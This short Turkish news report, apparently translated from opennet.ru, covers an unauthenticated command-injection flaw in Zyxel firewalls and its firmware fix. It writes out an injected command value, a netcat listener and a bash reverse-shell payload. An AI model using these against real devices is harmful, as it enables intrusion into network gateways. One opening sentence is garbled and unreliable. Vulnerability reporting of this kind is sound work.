Zyxel güvenlik duvarlarında kimlik doğrulaması olmadan kod yürütülmesine izin veren güvenlik açığı

İşletmelerde güvenlik duvarlarının, IDS ve VPN'in çalışmasını düzenlemek için tasarlanan ATP, VPN ve USG FLEX serisi Zyxel cihazlarında, harici bir saldırganın kimlik doğrulaması olmadan kullanıcı haklarına sahip olmayan cihaz. Bir saldırı gerçekleştirmek için saldırganın HTTP/HTTPS protokolünü kullanarak cihaza istek gönderebilmesi gerekir. Zyxel, ZLD 2022 ürün yazılımı güncellemesindeki güvenlik açığını giderdi. Shodan hizmetine göre şu anda küresel ağda HTTP/HTTPS yoluyla istekleri kabul eden 30525 potansiyel olarak savunmasız cihaz bulunuyor.

İşlem, kimlik doğrulaması olmadan erişilebilen web işleyicisi /ztp/cgi-bin/handler'a özel olarak tasarlanmış komutlar gönderilerek gerçekleştirilir. Sorun, lib_wan_settings.py kitaplığında kullanılan ve setWanPortSt işlemi işlenirken yürütülen os.system çağrısını kullanarak sistemde komutlar yürütülürken istek parametrelerinin uygun şekilde temizlenmemesinden kaynaklanmaktadır.

Örneğin bir saldırgan “; ping 192.168.1.210;" bu da sistem üzerinde “ping 192.168.1.210” komutunun çalıştırılmasına yol açacaktır. Komut kabuğuna erişim sağlamak için sisteminizde “nc -lvnp 1270” komutunu çalıştırabilir ve ardından '; ile cihaza bir istek göndererek ters bağlantı başlatabilirsiniz. bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

Kaynak: opennet.ru

Yorum ekle